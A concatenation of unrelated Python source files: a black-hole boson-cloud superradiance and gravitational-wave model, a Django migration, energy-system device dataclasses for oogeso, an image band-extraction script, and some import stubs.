`chi_bh` is dimensionless.
Arguments
---------
m_bh: float
black-hole mass (in MSUN, or SI if `msun` is False).
chi_bh: float
dimensionless BH spin.
m_b: float
boson rest mass (eV, or SI if `ev` is False).
boson_spin: int
spin of boson field (0 for scalar, 1 for vector).
alpha: float
fine-structure constant.
msun: bool
BH mass provided in solar masses, rather than SI (def True).
ev: bool
boson mass provided in eV, rather than SI (def True).
"""
s_b = kwargs.pop('boson_spin', 0)
bh_spin_kwargs = {k.strip('_bh'): kwargs.pop(k, None) for k in
['chi_bh', 'a_bh', 'j_bh']}
alpha = Alpha(**kwargs)
bh = BlackHole(alpha.m_bh, msun=False, **bh_spin_kwargs)
boson = Boson(alpha.m_b, spin=s_b, ev=False)
return cls(bh, boson)
# --------------------------------------------------------------------
# UTILITIES
def _sr_factor(self, m):
""" Super-radiance term for magnetic quantum number `m`.
Super-radiance takes place if this value is non-negative.
Arguments
---------
m: int
magnetic quantum number.
Returns
-------
sr_factor: float
m * Omega_bh - omega_boson (dimensionless)
"""
sr_factor_natural = m*self.bh.chi - 2*self.alpha*self.bh.rp_natural
# Note `sr_factor_natural` is dimensionless because:
# sr_factor_natural = (2 rp / c)*sr_factor
# with `sr_factor` the dimensionful factor (rad/s):
# sr_factor = m*self.bh.omega_horizon - self.boson.omega
return sr_factor_natural
def is_superradiant(self, m):
return self._sr_factor(m) >= 0
# --------------------------------------------------------------------
# FREQUENCY
def _level(self, n):
return hydrogenic_level(n, self.alpha)
def level_energy(self, n, units='ev'):
''' Return real part of hydrogenic energy eigenvalues.
Arguments
---------
n: float
*principal* quantum number `n = nr + l + 1`, for `nr` the radial
and `l` the azimuthal quantum numbers.
'''
units = units.lower()
if units == 'ev':
mu = self.boson.energy_ev
elif units == 'si':
mu = self.boson.energy
elif units == 'none':
mu = 1
return mu * self._level(n)
def level_omega_natural(self, n):
''' Return dimensionless hydrogenic eigen-frequencies.
Arguments
---------
n: float
*principal* quantum number `n = nr + l + 1`, for `nr` the radial
and `l` the azimuthal quantum numbers.
Returns
-------
omega_dimless: float
dimensionless angular frequency of nth eigenmode in rad/s.
'''
return self.alpha * self.level_energy(n, units='none')
def level_omega_re(self, n, method='hydrogen'):
''' Return real part of energy eigen-frequencies in rad/s.
Arguments
---------
n: float
*principal* quantum number `n = nr + l + 1`, for `nr` the radial
and `l` the azimuthal quantum numbers.
Returns
-------
omega: float
angular frequency of nth eigenmode in rad/s.
'''
if method=='hydrogen':
w = self.boson.omega * self._level(n)
elif method=='numeric':
NotImplementedError("numeric frequency solutuions unavailable.")
else:
raise ValueError("unrecognized method %r." % method)
return w
def level_frequency(self, n, *args, **kwargs):
''' Return real part of hydrogenic energy eigen-frequencies in Hz.
Arguments
---------
n: float
*principal* quantum number `n = nr + l + 1`, for `nr` the radial
and `l` the azimuthal quantum numbers.
Returns
-------
frequency: float
frequency of n-th eigenmode in Hz.
'''
return self.level_omega_re(n, *args, **kwargs) / (2*np.pi)
# --------------------------------------------------------------------
# GROWTH-RATE
def _clmn(self, l, m, nr):
""" Factor in computation of imaginary frequency.
gamma factor of Eq. (28) in Detweiler (1980), or equivalently
Clmn factor of Eq. (18) in Arvanitaki & Dubovsky (2011).
Without the spin correction, this gives a prefactor of 1/24.
for the (1, 1, 0) scalar state.
Arguments
---------
l: int
azimuthal quantum number.
m: int
magnetic quantum number.
nr: int
radial quantum number.
Returns
-------
clmn: float
gamma/cnlm factor.
"""
chi = self.bh.chi
sr_factor = self._sr_factor(m)
# Factor 1
f1 = factorial(2*l + nr + 1) * 2**(4*l + 2)
f1 /= factorial(nr) * (nr + l + 1)**(2*l + 4)
# Factor 2
f2 = (factorial(l) / (factorial(2*l)*factorial(2*l + 1)))**2
# Factor 3
js = np.arange(1, l+1)
factors = js**2 * (1 - chi**2) + sr_factor**2
# i.e. \[ j^2 (1-a^2/rg^2) + 4 rp^2 (m wp - mu)^2 \],
# with Arvanitaki+'s defns: `wp = omega_bh_natural / rg`, `alpha=mu rg`
f3 = np.product(factors)
return f1*f2*f3
def level_omega_im(self, l, m, nr, method='detweiler'):
''' Return imag part of hydrogenic energy eigen-frequencies in rad/s.
Importantly, this *half* of the occupancy number grow rate.
Can be computed in different regimes:
'detweiler'
This is from an analytic approximation in the nonrelativistic limit
`alpha << 1`. References:
Eq. (28) in Detweiler (1980)
Eq. (18) in Arvanitaki & Dubovsky (2011)
Eq. (8) in Brito et al. (2017)
'zouros'
This is from an analytic approximation in the WKB regime
`alpha >> 1`. References:
Zouros & Eardley (1979)
Eq. (27) in Arvanitaki & Dubovsky (2011)
'dolan'
Numerical method for the intermediate regime `alpha ~ 1`.
Dolan (2007)
Arguments
---------
l: int
azimuthal quantum number.
m: int
magnetic quantum number.
nr: int
radial quantum number.
Returns
-------
omega: float
angular frequency of nth eigenmode in rad/s.
'''
method = method.lower()
n = nr + l + 1
w0 = self.boson.omega
a = self.alpha
if method == 'detweiler':
# this agrees with Eq. (8) in arXiv:1706.06311
# sr = 2 rp^2 (m Obh - w) / c
sr = self._sr_factor(m)
# multiply by 0.5 to get field-amplitude growth
# that way, here clmn = 1/48. for (1, 1, 0)
clmn = 0.5*self._clmn(l, m, nr)
omega_im = w0 * a**(4*l +4) * sr * clmn
elif method == 'zouros':
number = 2. - np.sqrt(2)
omega_im = 1E-7 * (C_SI/self.bh.rg) * np.exp(-2*np.pi*a*number)
elif method == 'dolan':
raise NotImplementedError("method 'dolan' not implented yet.")
else:
e = "unrecognized method %r (valid options are: 'detweiler')"\
% method
raise ValueError(e)
return omega_im
def fgw(self, n):
''' Returns main gravitational-wave frequency for level `n`.
fgw = 2*fre = 2*(wre/2pi) = wre/pi
Arguments
---------
n: float
*principal* quantum number `n = nr + l + 1`, for `nr` the radial
and `l` the azimuthal quantum numbers.
Returns
-------
fgw: float
GW frequency in Hz.
'''
return self.level_omega_re(n) / np.pi
def max_growth_rate(self, l_min=0, nr_min=0, l_max=5, nr_max=5, **kwargs):
""" Search for level with fastest superradiant growth rate.
Arguments
---------
l_min: int
minimum azimuthal quantum number (def. 0).
nr_min: int
minimum radial quantum number (def. 0).
l_max: int
maximum azimuthal quantum number (def. 5).
nr_max: int
maximum radial quantum number (def. 5).
Returns
-------
l_best: int
azimuthal quantum number of fastest-growing level.
m_best: int
magnetic quantum number of fastest-growing level.
nr_best: int
radial quantum number of fastest-growing level.
rate_best: float
growth rate (Hz) of fastest-growing level.
"""
# Given the way the SR rate scales with `l`, we want the smallest `l`,
# with highest `m` that satisfies SR condition.
# TODO: is this true for vectors?
if self.alpha > 0.5:
# cannot satisfy SR condition
return 0, 0, 0, 0
else:
# TODO: this can be optimized
ls, ms, nrs, rates = [], [], [], []
for l in range(l_min, l_max+1):
for m in range(0, l+1):
for nr in range(nr_min, nr_max+1):
rate = self.level_omega_im(l, m, nr, **kwargs)
ls.append(l)
ms.append(m)
nrs.append(nr)
rates.append(rate)
i = rates.index(max(rates))
return ls[i], ms[i], nrs[i], rates[i]
# --------------------------------------------------------------------
# CLOUDS
def _add_cloud(self, l, m, nr):
cloud = BosonCloud(self, l, m, nr)
self.clouds[(int(l), int(m), int(nr))] = cloud
def best_cloud(self, *args, **kwargs):
""" Retrieve (or create) cloud with fastest SR growth-rate.
All arguments passed to growth-rate function.
Returns
-------
cloud: Cloud
cloud object for given quantum numbers.
"""
l, m, nr, _ = self.max_growth_rate(*args, **kwargs)
key = (int(l), int(m), int(nr))
if key not in self.clouds:
self._add_cloud(*key)
return self.clouds[key]
def cloud(self, l, m, nr, update_waveform=True):
""" Retrieve (or create) cloud of given level.
Arguments
---------
l: int
azimuthal quantum number.
m: int
magnetic quantum number.
nr: int
radial quantum number.
Returns
-------
cloud: Cloud
cloud object for given quantum numbers.
"""
key = (int(l), int(m), int(nr))
if key not in self.clouds:
self._add_cloud(*key)
if self._has_waveform and update_waveform:
self.waveform = self.create_waveform()
return self.clouds[key]
# --------------------------------------------------------------------
# GWS
def create_waveform(self, lmns=None, lgw_max=None):
""" Produce waveform (hp, hc) by adding contributions from clouds with
quantum numners `lmns`, up to GW azimuthal number `lgw_max`.
If no `lmns` are specified, will use all clouds present to produce waform.
If no `lgw_max` is specified, will only use the minimum (`l_gw=2*l_cloud`)
for each cloud.
Arguments
---------
lmns: list
optional list of tuples with cloud quantum numbers,
e.g. [(1,1,0), (2,1,2), ...] (def. all precomputed clouds).
lgw_max: int
maximum GW azimuthal number (2*l_cloud <= l_gw <= lgw_max).
Returns
-------
hp: function
plus polarization (function of theta, phi and time)
hc: function
cross polarization (function of theta, phi and time)
"""
if lmns is None:
lmns = self.clouds.keys()
hps, hcs = [], []
# loop over cloud lmn's
for lmn in lmns:
c = self.cloud(*lmn)
# loop over GW l's if specified, otherwise just set `l_gw=2*l_c`
lgw_max_loc = lgw_max or 2*c.l
for lgw in np.arange(2*c.l, lgw_max_loc+1):
hps.append(c.gw(lgw).hp)
hcs.append(c.gw(lgw).hc)
if len(hps) == 0:
raise ValueError("no matching clouds to produce waveform!")
def hp(*args, **kwargs):
return np.sum([hp(*args, **kwargs) for hp in hps])
def hc(*args, **kwargs):
return np.sum([hp(*args, **kwargs) for hp in hps])
return hp, hc
@cached_property
def waveform(self):
wf = self.create_waveform()
self._has_waveform = True
return wf
def hp(self, *args, **kwargs):
r = kwargs.pop('r', 1)
return self.waveform[0](*args, **kwargs) / r
def hc(self, *args, **kwargs):
r = kwargs.pop('r', 1)
return self.waveform[1](*args, **kwargs) / r
class BosonCloud(object):
def __init__(self, bhb, l, m, nr, evolve=True, evolve_params=None, from_final=False):
""" Boson cloud around a black hole, corresponding to single level.
Arguments
---------
bhb: BlackHoleBoson
black-hole-boson object
l: int
azimuthal quantum number.
m: int
magnetic quantum number.
nr: int
radial quantum number.
evolve: bool
whether to compute final BH mass and spin numerically or approximate.
from_final: bool
interpret `bhb` as the post-SR, rahter than pre, black-hole-boson system.
"""
# check `bhb` is of the right type
try:
bhb.boson.reduced_compton_wavelength
bhb.bh.rg
except AttributeError:
raise ValueError("'bhb' must be `BlackHoleBoson` instance, not %r"
% type(boson))
if from_final:
self._bh_initial = None
self._bhb_initial = None
self._bhb_final = bhb
self._bh_final = self.bhb_final.bh
else:
self._bhb_initial = bhb
self._bh_initial = self.bhb_initial.bh
self._bh_final = None
self._bhb_final = None
# check consistency of quantum numbers
if (0 <= l) & (np.abs(m) <= l) & (0 <= nr) & isinstance(nr*l*m, int):
self.n = nr + l + 1 # principal quantum number
self.nr = nr
self.l = l
self.m = m
else:
raise ValueError("invalid quantum numbers (l, m, nr) = (%r, %r, %r)"
% (l, m, nr))
# set cloud properties
self.age = 0 # age is the actual age of the cloud after evolving
self._growth_time = None
self._life_time = None # lifetime is the characteristic duration of the cloud
self._is_superradiant = None
self._mass = None
self._mass_msun = None
# set gravitational-wave properties
self._zabs = {}
self._gws = {}
self._fgw = None
# solve DEs for cloud evolution, or approximate final values
self.evolve = evolve
self._evolve_params = evolve_params or {'y_0': 1E-8}
# --------------------------------------------------------------------
# CLASS METHODS
@classmethod
def from_parameters(cls, l, m, nr, evolve=True, evolve_params=None,
from_final=False, **kwargs):
bhb = BlackHoleBoson.from_parameters(**kwargs)
return cls(bhb, l, m, nr, evolve=evolve, evolve_params=evolve_params,
from_final=from_final)
# TODO: optimize
def _backtrack_instability(self, **kwargs):
# get guesses for initial BH parameters if provided
m_i_0 = kwargs.pop('m_i_0', 1.11*self.bhb_final.bh.mass)
m_i_frac_0 = m_i_0 / self.bhb_final.bh.mass
chi_i_0 = kwargs.pop('chi_i_0', 1.)
initial_guess = np.array([m_i_frac_0, chi_i_0])
def evolve(mfrac_chi):
m_i_frac, chi_i = mfrac_chi
bh_i = BlackHole(m_i_frac*self.bhb_final.bh.mass, chi=chi_i)
bhb_i = BlackHoleBoson(bh_i, self.bhb_final.boson)
cloud = BosonCloud(bhb_i, self.l, self.m, self.nr, **kwargs)
m_f = cloud.bhb_final.bh.mass
chi_f = cloud.bhb_final.bh.chi
dm_frac = (m_f - self.bhb_final.bh.mass)/self.bhb_final.bh.mass
dchi = chi_f - self.bhb_final.bh.chi
return np.sqrt(dm_frac**2 + dchi**2)
from scipy.optimize import minimize
res = minimize(evolve, initial_guess, method='L-BFGS-B',
bounds=[(1., 1.4), (self.bhb_final.bh.chi, 0.99999)])
return res
def _evolve_instability(self, y_0=1E-8, dtau=None, max_steps=1E6, tolerance=1e-3,
dtau_adapt_frac=0.1, dtau_adapt_thresh=0.05,
m_accretion_rate=0, j_accretion_rate=0, bhb_0=None):
""" Solve cloud evolution equations, ignoring cloud angular momentum and GW power.
See documentation for `evolve_bhb` for more information.
Arguments
---------
Returns
-------
"""
bhb_0 = bhb_0 or self.bhb_initial
l = self.l
m = self.m
nr = self.nr
# initial mass
M0 = bhb_0.bh.mass
T0 = G_SI*M0/C_SI**3
# time step
epsilon = 1./bhb_0.boson.omega
dtau = dtau or self.amplitude_growth_time/1000.
# other dimensionfull constants
alpha = M0
beta = epsilon*M0*C_SI**2
gamma = M0*C_SI**2 / epsilon
# initial state
x_0 = 1
jx_0 = bhb_0.bh.angular_momentum / beta # same as alpha_0/2
n = l + nr + 1
wR_0 = bhb_0.level_omega_re(n) * epsilon
wI_0 = bhb_0.level_omega_im(l, m, nr) * epsilon
# dimensionless accretion rates
dimless_m_accretion_rate = m_accretion_rate * C_SI**2 / gamma
dimless_j_accretion_rate = j_accretion_rate * epsilon / beta
# initialize arrays
xs = [x_0]
ys = [y_0]
jxs = [jx_0]
inv_wRs = [1./wR_0]
wIs = [wI_0]
sr_conds = [get_sr_cond(x_0, jx_0, T0, epsilon, m=m)]
times = [0]
if not bhb_0.is_superradiant(m):
# print "WARNING: initial BHB not superradiant for m = %i (alpha=%.6f)" \
# % (m, bhb_0.alpha)
bhb_new = bhb_0
else:
# evolve
for i in range(int(max_steps)):
# update x & j
dx = - 2*wIs[i]*ys[i]*dtau
x_new = xs[i] + dx + dimless_m_accretion_rate*dtau
y_new = ys[i] - dx
# update jx & jy
jx_new = jxs[i] - 2*m*wIs[i]*inv_wRs[i]*ys[i]*dtau +\
dimless_j_accretion_rate*dtau
# update w's
# TODO: optimize this to not rely on BH and BHB objects
bh = BlackHole(x_new*alpha, j=jx_new*beta)
bhb_new = BlackHoleBoson(bh, bhb_0.boson)
inv_wR_new = 1./ (bhb_new.level_omega_re(n) * epsilon)
wI_new = bhb_new.level_omega_im(l, m, nr) * epsilon
# append
xs.append(x_new)
ys.append(y_new)
jxs.append(jx_new)
inv_wRs.append(inv_wR_new)
wIs.append(wI_new)
times.append(times[i] + dtau)
# compute SR condition
sr_cond = get_sr_cond(x_new, jx_new, T0, epsilon, m=m)
sr_conds.append(sr_cond)
# decide whether to terminate
frac_decrease = (sr_conds[i] - sr_cond)/float(sr_cond)
change_ratio = float(sr_cond)# / sr_conds[0]
if frac_decrease < tolerance and (change_ratio < tolerance):
break
elif frac_decrease < dtau_adapt_thresh:
# adapt time step
dtau *= 1. + dtau_adapt_frac
elif frac_decrease > dtau_adapt_thresh:
# adapt time step
dtau *= 1. - dtau_adapt_frac
cs = tuple([np.array(l) for l in [xs, jxs, ys, inv_wRs, wIs, sr_conds, times]])
return bhb_new, cs
# --------------------------------------------------------------------
# PROPERTIES
@property
def is_superradiant(self):
""" Indicates whether this energy level (l, m, n) is superradiant.
"""
if self._is_superradiant is None:
self._is_superradiant = self.bhb_initial.is_superradiant(self.m)
return self._is_superradiant
@property
def amplitude_growth_time(self):
""" Field amplitude superradiant-instability timescale: `1/Im(omega)`.
"""
if self._growth_time is None:
self._growth_time = 1./self.bhb_initial.level_omega_im(self.l, self.m,
self.nr)
return self._growth_time
@property
def number_growth_time(self):
""" Occupation number superradiant-instability timescale: `0.5/Im(omega)`.
"""
return 2.*self.amplitude_growth_time
@property
def bh_initial(self):
""" Black-hole before start of superradiant cloud growth.
"""
if self._bh_initial is None:
if self.evolve:
self._bh_initial = self.bhb_initial.bh
else:
# initial BH angular momentum from Eq. (25) in Brito et al.
# approximating the final alpha with the initial alpha
rg = self.bh_final.rg
w = self.bhb_final.level_omega_re(self.n)
chi_f = self.bhb_final.bh.chi
m_i = (2*(C_SI*rg*w + np.sqrt((C_SI*rg*w)**2 -
(chif*C_SI*rg*w)**2)))/\
(chif*C_SI**2)
# initial BH spin from Eq. (26) in Brito et al.
w_nat = self.bhb_final.level_omega_natural(self.n)
chi_i = (m_i + chi_f*m_i*w_nat - m_f) / (m_i*w_nat)
self._bh_initial = BlackHole(m_i, chi_i)
return self._bh_initial
@property
def bhb_initial(self):
""" Black-hole-boson before start of superradiant cloud growth.
"""
if self._bhb_initial is None:
if self.evolve:
self._bhb_initial, _ = self._backtrack_instability(evolve_params=self._evolve_params)
# note that the value of y_0 does not affect final state,
# but a higher value means fewer steps
else:
self._bhb_initial = BlackHoleBoson(self.bh_initial,
self.bhb_final.boson)
return self._bhb_initial
@property
def bh_final(self):
""" Black-hole left at the end of superradiant cloud growth.
"""
if self._bh_final is None:
if self.evolve:
self._bh_final = self.bhb_final.bh
else:
# final BH angular momentum from Eq. (25) in Brito et al.
# approximating the final alpha with the initial alpha
rg = self.bh_initial.rg
w = self.bhb_initial.level_omega_re(self.n)
chi_f = 4*C_SI*self.m*rg*w / ((C_SI*self.m)**2 + 4*(rg*w)**2)
# final BH mass from Eq. (26) in Brito et al.
w_nat = self.bhb_initial.level_omega_natural(self.n)
m_f = self.bh_initial.mass*(1 - w_nat*(self.bh_initial.chi - chi_f))
self._bh_final = BlackHole(m_f, chi_f)
return self._bh_final
@property
def bhb_final(self):
""" Black-hole-boson left at the end of superradiant cloud growth.
"""
if self._bhb_final is None:
if self.evolve:
self._bhb_final, _ = self._evolve_instability(**self._evolve_params)
# note that the value of y_0 does not affect final state,
# but a higher value means fewer steps
else:
self._bhb_final = BlackHoleBoson(self.bh_final,
self.bhb_initial.boson)
return self._bhb_final
@property
def mass(self):
""" Maximum cloud mass (kg), reached at end of superradiant stage.
"""
if self._mass is None:
self._mass = self.bh_initial.mass - self.bh_final.mass
self._mass_msun = self._mass / MSUN_SI
return self._mass
@property
def mass_msun(self):
""" Maximum cloud mass (MSUN), reached at end of superradiant stage.
"""
if self._mass_msun is None:
self.mass
return self._mass_msun
# --------------------------------------------------------------------
# GW PROPERTIES
@property
def fgw(self):
""" Gravitational-wave frequency (Hz).
"""
if self._fgw is None:
self._fgw = 2.*self.bhb_final.level_frequency(self.n)
return self._fgw
def zabs(self, lgw=None):
lgw = lgw or 2*self.l
# the GW is allowed to have any l_gw >= 2*l_cloud, but only m_gw = 2*m_cloud
if lgw not in self._zabs:
self._zabs[lgw] = Zabs(lgw, 2*self.m)(self.bhb_final.alpha)
return self._zabs[lgw]
def gw(self, lgw=None):
lgw = lgw or 2*self.l
if lgw not in self._gws:
if lgw < 2*self.l:
raise ValueError("Must have `l_gw >= 2*l_cloud = %i`."
% 2*self.l)
# intrinsic amplitude, 1m away from the source (`h0r = h0*r`).
wgw = 2*np.pi*self.fgw
m_bh = self.bh_final.mass
m_c = self.mass
h0r = (C_SI**4/G_SI) * 2.*self.zabs(lgw=lgw)*m_c / (wgw*m_bh)**2
# SWSH spin parameter: dimensionless (spin x omega_gw)
c = self.bh_final.chi * 2*np.pi*self.fgw * self.bh_final.tg
self._gws[lgw] = GravitationalWaveMode(self.fgw, c=c, l=lgw,
m=2*self.m, h0r=h0r)
return self._gws[lgw]
def get_life_time(self, lgws=None):
""" GW timescale, adding lgws listed in argument (def. just 2*l_cloud) .
"""
lgws = self._gws.keys() if lgws is None else lgws
if len(lgws)==0:
lgws = [2*self.l]
powers = []
for lgw in lgws:
powers.append(self.gw(lgw=lgw).power)
rest_energy = self.mass*C_SI**2
tgw = rest_energy / sum(powers)
return tgw
class Zabs(object):
# Numerical fits to fine-structure constant alpha (`a`) provided by R Brito
# (set up this way to make it easier to add fits dynamically later.)
# NOTE: these fits assume `chi = chi_f`, could generalize to arbitrary spin
_FITS = {
(2, 2): lambda a : Z22fitvec(a) if isinstance(a, (list, tuple, np.ndarray)) else Z22fit(a),
(3, 2): lambda a: 1.0956326467084279*a**10 - 6.937259458016552*a**12 + 28.671829466292383*a**14,
}
def __init__(self, l, m):
self.l = int(l)
self.m = int(m)
self._alpha_fit = None
@property
def alpha_fit(self):
if self._alpha_fit is None:
key = (self.l, self.m)
if key in self._FITS:
self._alpha_fit = self._FITS[key]
else:
# TODO: add ability to produce fits dynamically here
raise NotImplementedError("no exisiting fit for (%i, %i)" %
(self.l, self.m))
return self._alpha_fit
def __call__(self, alpha):
return self.alpha_fit(alpha)
@staticmethod
def fast_fit(a, lgw=2, mgw=2):
return Zabs._FITS[lgw, mgw](a)
class GravitationalWaveMode(object):
def __init__(self, f, l=2, m=2, h0r=1, r0=1, c=0):
""" A single (l, m) gravitational wave.
Arguments
---------
f: float
signal frequency
l: int
azimuthal number (def. 2)
m: int
magnetic number (def. 2)
c: float
dimensionless spheroidal-harmonics parameter `c=a*omega` (def. 0).
h0r: float
intrinsic amplitude at fiducial distance, `h0r = h0(r0)` (def. 1).
r0: float
reference distance `r0` in meters (def. 1).
"""
self.c = c
self.l = l
self.m = m
self.f = f
self.omega = 2*np.pi*self.f
self.h0r = h0r
self.r0 = r0
# total radiated power in this mode (ATTENTION: +/- m both included)
self.power = C_SI**3*(self.omega * self.h0r)**2 / (8.*np.pi*G_SI)
# others
self._swsh = None
self._polarizations = None
@property
def swshs(self):
if self._swsh is None:
c = self.c
l = self.l
m = self.m
s = -2 # spin-weight of GWs
self._swsh = (leavers.SpinWeightedSpheroidalHarmonic(c, l, m, s),
leavers.SpinWeightedSpheroidalHarmonic(c, l, -m, s))
return self._swsh
@property
def polarizations(self):
if self._polarizations is None:
wgw = self.omega
m = self.m
swsh_p, swsh_m = self.swshs
def hp(theta, phi, t):
return np.cos(wgw*t + m*phi)*(swsh_p(theta, phi) +
swsh_m(theta, phi)).real
def hc(theta, phi, t):
return np.sin(wgw*t + m*phi)*(swsh_p(theta, phi)-
swsh_m(theta, phi)).real
self._polarizations = (hp, hc)
return self._polarizations
def hp(self, *args, **kwargs):
""" Plus polarization (unit amplitude).
Arguments
---------
theta: float
inclination angle
phi: float
orbital phase (azimuthal angle)
t: float, array
times.
r: float
distance from source in meters (def. 1).
Returns
-------
hp: array
plus polarization waveform for given times.
"""
r = kwargs.pop('r', self.r0)
return (self.r0 / r)*self.polarizations[0](*args, **kwargs)
def hc(self, *args, **kwargs):
""" Cross polarization (unit amplitude).
Arguments
---------
theta: float
inclination angle
phi: float
orbital phase (azimuthal angle)
t: float, array
times.
r: float
distance from source in meters (def. 1).
Returns
-------
hp: array
cross polarization waveform for given times.
"""
r = kwargs.pop('r', self.r0)
return (self.r0 / r)*self.polarizations[1](*args, **kwargs)
|
from nicos.devices.tango import BaseImageChannel as ImageChannel
|
# Generated by Django 3.1.1 on 2020-09-19 20:32
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('drinks', '0009_order_status'),
]
operations = [
migrations.RemoveField(
model_name='order',
name='status',
),
]
|
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from oogeso import dto
# Device types defined as part of "basic":
# DevicePowerSourceData
# DeviceSink_elData
# DeviceStorage_elData
@dataclass
class DeviceSourceElData(dto.DeviceData):
co2em: Optional[float] = None
op_cost: Optional[float] = None
reserve_factor: float = 1 # not used capacity contributes fully to spinning reserve
@dataclass
class DeviceSourceGasData(dto.DeviceData):
naturalpressure: float = None
@dataclass
class DeviceSourceWaterData(dto.DeviceData):
naturalpressure: float = None
@dataclass
class DeviceSinkElData(dto.DeviceData):
pass
@dataclass
class DeviceSinkHeatData(dto.DeviceData):
pass
@dataclass
class DeviceSinkGasData(dto.DeviceData):
price: field(default_factory=lambda: {}) = None
@dataclass
class DeviceSinkOilData(dto.DeviceData):
price: field(default_factory=lambda: {}) = None
@dataclass
class DeviceSinkWaterData(dto.DeviceData):
price: field(default_factory=lambda: {}) = None
flow_avg: Optional[float] = None # required average flow
max_accumulated_deviation: Optional[float] = None # buffer size (max accumulated deviation from average)
@dataclass
class DeviceCompressorElData(dto.DeviceData):
eta: float = None # efficiency
Q0: float = None # nominal flow rate used in linearisation
temp_in: float = None # inlet temperature
@dataclass
class DeviceCompressorGasData(dto.DeviceData):
eta: float = None # efficiency
Q0: float = None # nominal flow rate used in linearisation
temp_in: float = None # inlet temperature
@dataclass
class DeviceElectrolyserData(dto.DeviceData):
eta: float = None # efficiency
eta_heat: float = None # heat recovery efficiency
@dataclass
class DeviceFuelCellData(dto.DeviceData):
eta: float = None # efficiency
eta_heat: float = None # heat recovery efficiency
@dataclass
class DeviceGasHeaterData(dto.DeviceData):
pass
@dataclass
class DeviceGasTurbineData(dto.DeviceData):
fuel_A: float = None
fuel_B: float = None
eta_heat: float = None
# is_on_init: bool = False
# startup_cost: float = None
# startup_delay: float = None # Minutes from activation to power delivery
# shutdown_cost: float = None
reserve_factor: float = 1 # not used capacity contributes fully to spinning reserve
@dataclass
class DeviceHeatPumpData(dto.DeviceData):
eta: float = None
@dataclass
class DevicePumpOilData(dto.DeviceData):
eta: float = None # efficiency
@dataclass
class DevicePumpWaterData(dto.DeviceData):
eta: float = None
@dataclass
class DeviceSeparatorData(dto.DeviceData):
el_demand_factor: float = None # electricity demand factor
heat_demand_factor: float = None # heat demand factor
@dataclass
class DeviceSeparator2Data(dto.DeviceData):
el_demand_factor: float = None # electricity demand factor
heat_demand_factor: float = None # heat demand factor
@dataclass
class DeviceStorageHydrogenData(dto.DeviceData):
E_max: float = 0 # MWh storage capacity (maximum stored energy)
E_min: float = 0
eta: float = 1 # efficiency
target_profile: Optional[str] = None # target profile for use of (seasonal) storage
E_cost: float = 0 # cost for depleting storage
E_init: float = 0
@dataclass
class DeviceWellProductionData(dto.DeviceData):
wellhead_pressure: float = None # 2 # MPa
@dataclass
class DeviceWellGasLiftData(dto.DeviceData):
gas_oil_ratio: float = None # 500
water_cut: float = None # 0.6
f_inj: float = None # 220 # gas injection rate as fraction of production rate
injection_pressure: float = None # 20 # MPa
separator_pressure: float = None # 2 # MPa
@dataclass
class EdgeHeatData(dto.EdgeData):
# Heat loss in MW as function of energy transfer in MW:
power_loss_function: Optional[Tuple[List[float], List[float]]] = None
@dataclass
class EdgeHydrogenData(dto.EdgeData):
bidirectional: bool = False
@dataclass
class EdgeFluidData(dto.EdgeData):
# wellstream, oil, water, gas
pressure_from: float = None
pressure_to: float = None
diameter_mm: float = None
temperature_K: float = None
height_m: float = 0
num_pipes: Optional[int] = None
bidirectional: bool = False
# allovable relative deviation of pressure from nominal values,
pressure_from_maxdeviation: Optional[float] = None
pressure_to_maxdeviation: Optional[float] = None
@dataclass
class EdgeGasData(EdgeFluidData):
pass
@dataclass
class EdgeOilData(EdgeFluidData):
pass
@dataclass
class EdgeWellstreamData(EdgeFluidData):
pass
@dataclass
class EdgeWaterData(EdgeFluidData):
pass
@dataclass
class CarrierHeatData(dto.CarrierData):
pass
@dataclass
class CarrierHydrogenData(dto.CarrierData):
energy_value: float = 13 # MJ/Sm3 (calorific value) -> 13 MJ/Sm3
@dataclass
class CarrierGasData(dto.CarrierData):
co2_content: float # kg/Sm3 - see SSB 2016 report -> 2.34 kg/Sm3
G_gravity: float # 0.6
Pb_basepressure_MPa: float # MPa -> 0.101 # MPa
R_individual_gas_constant: float # J/(kg K) -> 500 J/kgK
Tb_basetemp_K: float # K -> 288 K = 15 degC
Z_compressibility: float # 0.9
energy_value: float # MJ/Sm3 (calorific value) -> 40 MJ/Sm3
k_heat_capacity_ratio: float # 1.27
rho_density: float # kg/m3 -> 0.84 kg/m3
pressure_method: Optional[str] = "weymouth" # pressure drop calculation
@dataclass
class CarrierWellstreamData(dto.CarrierData):
darcy_friction: float = None # 0.02
rho_density: float = None # kg/m3 -> 900 kg/m3
viscosity: float = None # kg/(m s) -> 0.0026 kg/(m s)
pressure_method: Optional[str] = None
water_cut: float = None
gas_oil_ratio: float = None
@dataclass
class CarrierOilData(dto.CarrierData):
darcy_friction: float = None # 0.02
rho_density: float = None # kg/m3 -> 900 kg/m3
viscosity: float = None # kg/(m s) -> 0.0026 kg/(m s)
pressure_method: Optional[str] = "darcy-weissbach" # pressure drop calculation
@dataclass
class CarrierWaterData(dto.CarrierData):
darcy_friction: float = None # 0.02
rho_density: float = None # kg/m3 -> 900 kg/m3
viscosity: float = None # kg/(m s) -> 0.0026 kg/(m s)
pressure_method: Optional[str] = "darcy-weissbach" # pressure drop calculation
|
from processing_functions import color_stuff as mn
import cv2
import glob
from processing_functions import misc as msc
import os
# impath = "/home/kauevestena/data/extracted_images/2019-06-13-15-43-38/ngr/2419.jpg"
# outpath = "/home/kauevestena/data/extracted_images/transformed/teste_b.jpg"
# mn.save_one_band(impath,outpath)
# img = cv2.imread("/home/kauevestena/testes/CamVid/test/0001TP_007170.png")
# cv2.imshow("teste",img)
# cv2.waitKey(0)
folderlist =[
"/home/kaue/data/extracted_images/2019-07-11-16-21-46/ngr"
]
OutPthList = [
"/home/kaue/data/extracted_images/nir_band",
"/home/kaue/data/extracted_images/red_band"
]
for folder in folderlist:
print(folder)
# for filepath in glob.glob(os.path.join(folder,"*.png'")):
# joinedpath = os.path.join(folder,"")
for filepath in glob.glob(folder+"/*.jpg"):
# print(filepath)
fileName = msc.fileNumberFromPathAsStr(filepath)
mn.save_one_band(filepath,os.path.join(OutPthList[0],fileName+'.png'),channel=0)
mn.save_one_band(filepath,os.path.join(OutPthList[1],fileName+'.png'))
msc.telegram_bot_sendtext("band extraction terminated") |
from __future__ import print_function
from onmt.translate.translator import Translator as _Translator
import onmt.model_builder
import onmt.translate.beam_search
from onmt.translate import TranslationBuilder as _TransBuilder
import onmt.inputters as inputters
import onmt.decoders.ensemble
